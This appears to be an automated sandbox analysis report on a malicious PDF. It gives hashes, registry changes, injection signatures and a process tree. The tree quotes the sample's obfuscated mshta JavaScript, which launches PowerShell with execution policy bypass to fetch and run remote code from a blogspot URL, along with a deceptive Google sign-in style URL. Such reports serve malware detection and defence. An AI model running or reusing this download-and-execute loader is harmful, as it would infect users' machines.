Analysis
-
max time kernel
117s -
max time network
142s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
07-02-2024 15:19
Behavioral task
behavioral1
Sample
a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf
Resource
win10v2004-20231215-en
General
-
Target
a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf
-
Size
50KB
-
MD5
feac523f300947e52e2e5ca44221d9d9
-
SHA1
ac6dc611f760b48779bded9a5e6816c91375fd2a
-
SHA256
a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559
-
SHA512
53cd297d814b2e4b99926502c49a95128c1e4ed564476c8c67f19bb0d5423889a4be60384975a2d35545fdfaf21785dc2d0c9e7828a5dfac4ed988eab11ff332
-
SSDEEP
384:86SDvX7hWFcTPm/K7Uzzzzzzzzzzzzzzzzz3SkYTZvL:86ST7hWGTO/KQ8ZvL
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
IEXPLORE.EXEiexplore.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{64E259A1-C5CC-11EE-88F9-76B33C18F4CF} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "413481084" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2832 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 2220 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2832 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 2704 iexplore.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
AcroRd32.exeiexplore.exeIEXPLORE.EXEpid process 2220 AcroRd32.exe 2220 AcroRd32.exe 2220 AcroRd32.exe 2704 iexplore.exe 2704 iexplore.exe 2952 IEXPLORE.EXE 2952 IEXPLORE.EXE 2952 IEXPLORE.EXE 2952 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
AcroRd32.exemshta.exeiexplore.exedescription pid process target process PID 2220 wrote to memory of 2380 2220 AcroRd32.exe mshta.exe PID 2220 wrote to memory of 2380 2220 AcroRd32.exe mshta.exe PID 2220 wrote to memory of 2380 2220 AcroRd32.exe mshta.exe PID 2220 wrote to memory of 2380 2220 AcroRd32.exe mshta.exe PID 2220 wrote to memory of 2704 2220 AcroRd32.exe iexplore.exe PID 2220 wrote to memory of 2704 2220 AcroRd32.exe iexplore.exe PID 2220 wrote to memory of 2704 2220 AcroRd32.exe iexplore.exe PID 2220 wrote to memory of 2704 2220 AcroRd32.exe iexplore.exe PID 2380 wrote to memory of 2832 2380 mshta.exe powershell.exe PID 2380 wrote to memory of 2832 2380 mshta.exe powershell.exe PID 2380 wrote to memory of 2832 2380 mshta.exe powershell.exe PID 2380 wrote to memory of 2832 2380 mshta.exe powershell.exe PID 2704 wrote to memory of 2952 2704 iexplore.exe IEXPLORE.EXE PID 2704 wrote to memory of 2952 2704 iexplore.exe IEXPLORE.EXE PID 2704 wrote to memory of 2952 2704 iexplore.exe IEXPLORE.EXE PID 2704 wrote to memory of 2952 2704 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\a2e7f3210ef4f7fb06606399dd09b873715abc2ce4a45900bd2434f37d55c559.pdf"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" "javascript:_r°0=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;','run']; x°x=[_r°0[3],_r°0[0],_r°0[1],_r°0[2]]; new ActiveXObject(x°x[2])[x°x[0]](x°x[3], 0, true);close();new ActiveXObject(x°x[1]).DeleteFile(WScript.ScriptFullName);"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlfeb24.blogspot.com//////////////////////////////atom.xml | iex);Start-Sleep -Seconds 5;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com+signin%3Dsecure+v2+identifier%[email protected]////////atom.xml?http://www.booking.com2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2704 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2952
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5252f5497cfeac5bbcbc4a10c17941e37
SHA1083e43af5860bd07ab549f8bc4421cd113b82d71
SHA256aa72b5e6d65a505be7330b3e4ac21858dc141551f374271574b4134f58c7b09a
SHA512dcf5a00a30a23e36be639cfbd878ec0f5e53f6601ba780e7c31b68f5f3f222a1dd21d59b288a7844c4c71614cf2bb86bfd304f60e75042cd29476d9b38495aa4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c27afeb0bbae829db72ac30e5ba8d55c
SHA121fc03619fb367c23afd19872a25309941184035
SHA256f7df667bad612c7ef970208e686a86939da936df336b48722d68829ffba57596
SHA512a8ae8f1ba1140052be6817f9378d21a44cc8590e7e7172bf0da7a2d2186d47fa5c863887acad98a7e745a4c54bf60428bf299b96fd143f1f0b514ad1e0d17083
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD51552a5ea0085d32ce9b633caff6ea458
SHA1eea575081698284bb1b2967a513bfa6ce343f63b
SHA25691ac8d23997476df5fcc982f8336e3a275ea92aaa75faa40a9732b8e8a24749c
SHA512e1089712ca43a223e8fca7b0509c09271b2f276b24d565247dfec73f05645638002b83c03b637df63e820340cb7e92da988b8261cd66c632a3dd5838c0a03abe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ba583ef38f6baf36e9b695be5271da1e
SHA179539f9a46efcf3237ad1edbbdb823056910fca9
SHA25604629e02177e94c6d94c4f81d65731259a5610cace5d89868e528f061172849b
SHA512e4e7e77a90e34efdcebe082b12f88689fb6fd50a9365f7b873fd48924f3d73c84967f26ef15799356c7c11f112ad05ff161de805afc65bff2d18d3f1922ae61a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD532841ca4fa1bc43b9bfdea0e0a809734
SHA14fd0479154ecf315bbb3c4760e520336509578b0
SHA256323eb37ef5f6141f77f8a68ea3d4aa41c51cff7650c1f16b9ce2323d852fc8a9
SHA512c6b74f093612d10e02bf88823dd03551d8fcdb180abfebbcdd22f780fe95cd6d632dacdf9a7c5012f5dbc022c0bc4b49560bb9aaaa685bf99ba362b13a483515
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD56f41fa6bf50428e27e18a4b73859d553
SHA15213ce7c502d6c68e058ddb820987eaa0a4ac265
SHA2564e56456bbd1fa9389bab026236e25db2e10c59e095cd49097ac5c6cdb3d5bbb9
SHA512ae3875aa89d1a7cd8cb91fb7b1207b6b063e8b0f7316701c684503a34ccadf8f4feb19938f4cc00505e6b03909a920b3f2949c57ea174e867d572fef6ff83d88
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD56fa1e81b3de224840b5143ceeded9e90
SHA11c0afb63b62b8c7d3440770c90524411bc2b79e7
SHA25603e3221be5e5b912823cb5e3cd94912f4dc710ce3fe538625b7e9eb4e494c863
SHA512fe34c907c7596103221381880de550c624204421862abc0f53685295c10bfe017f80cc0c650f49eb83ff4b0377a94a8fdd12eec94628c0ce7fba2d7ab077233b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58f71a8d423c2947fc044cf4b4ed43f98
SHA1eab2aab527b44e7cf2034ebda17b6fd848e6ab6b
SHA25630ad6f585136519107bc9cccdc9d323cb103c13060d2c3534f2e0464c11aa4f5
SHA512a74cec782b47373c42c6470b3e7b57914f66fd34e7b42b6d8d4d6dae888c7e2946a094368e51cd73e2a684e1d68c2834480604e4f8a54cfe3476c607560877b0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD519039e901207bdae8e1376cfe09f645d
SHA13b7d6496d545018b5582c6d9254cd2f2cbb69d50
SHA256b86036abc1cc1050b9f00e714af1f3815fdc4d4c135e084be17755ed6544d1f9
SHA512dc0d2303de593de3e0e8c232279f9aa475c7d39a6bac1fcc698e9dd92a768ff17d63d19fdadb3d1df6ad68f7bde48078dbb576344dcdc125a9fa8823317de872
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5b501d6c97d61eab195fe4b7f1dcc09f8
SHA1c4399036054545b1383e57558579fc219eb637a3
SHA2567f2aa8af38f5d3b02599cec5abee04e75934013e97ba933093102377a94c216b
SHA512efa02893195637ea85581a658f21d9211bf29f737901c7cdfddf3a26f77b6b6341f6bca75184ebed3e2daad2273f94e78e412879f28d3715dccf385e1bb7da28
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD55c9b1499a0a2f81923e70d1ff1b8e50c
SHA1d2073a348bced4cf5b0a05c88ea56a57745ddabb
SHA2560f5199d2a81ab952c75b1bb118cf60eeea68af00e21cc5bd89aa9ee0ad4088a4
SHA512996a2efae7572ce5952b3ad8d0bf6a4af21843efaa6c92a1e74dba9aeaf0bbd8e15be3c32b6fcff86de7fe7257bfcc642e9ab0106fd3db75fb2ae1f79f520a02
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50724b11ea4746fc28a6364d09304c3fb
SHA1117eea326a6a37ae10064591e804e629b6be8fc5
SHA2566d10b002d09babd7bdc3281fe31367fe9f89a92078d54e3afa1105c57d332029
SHA5122424fcf978afcfa1eab5f57a858bdd432b9492d1a76311d6080249f90b409cbcbceed0b0dc49ab0dbb6bcc1ec43b10453f9df0904451184b73155c1fd53fd7c8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e7a3f93d49007c771a34eaccac1c9a63
SHA182d4dd111e89a90a38ed0d4afef2968b5c3a07f6
SHA256b873d365ab2528156e4f8232a46b9adde78d108951276b868445176f5747def1
SHA512f3d469f829caed995832de71b76b8a398ab369f98a4351cf1058c65b9696308ce9112f6c377913f52533dff3c7659ef808fb4c252056b9239d060fe1e7f90271
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5fc0b98705430d61eb6d26c306eeadcb9
SHA1c2102f9d1606733a198b2718ae31890d1dbf6977
SHA256dbc35cfbe4f6b68ea8544a363a86c4e22f0aad37d6f281df572378bb28ec65b6
SHA5126ebc4fd3564236326ae2b28e2df414e178e232751022e9d4a84afd51c5a69fc53ea97bbdfc59c8ec1105884b6a6987a0ea3bd814e06dd6bc6162be601726a9b2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5cc43d3ba9e35a0839c116f013b4b726e
SHA1e0ad3f113f18c426cb9662b5b0a6c60e186a69d7
SHA256c63609a38c78b4d1e94f462f9b1ca72d0b704655dc2850280d098eac1505c5a7
SHA5128c9d2e0349cb64e59b19400e55b547fb1feb12f327b2a4b01395f916080b2d912e41d88357c03ec0baf6f4337d0c22d8784e044483be2be2cc46368cbefb27c8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD56f1b37e9aa88930e15b4aee3afc03f79
SHA1be3636743e4773e342c40c2be24277b4604ce2bf
SHA256af0d5f920aeed99be40e6d1aba6a7f7264a4a98c6f2b80d66e564453cb71185c
SHA5124fa556f9b362947675e2dd51d59d821abbafaefbc1127fd71a3a24cea24b557ac077b00b14fc892b1303c95dc922de1edd4b48077cfc21e7f771bf744455831f
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06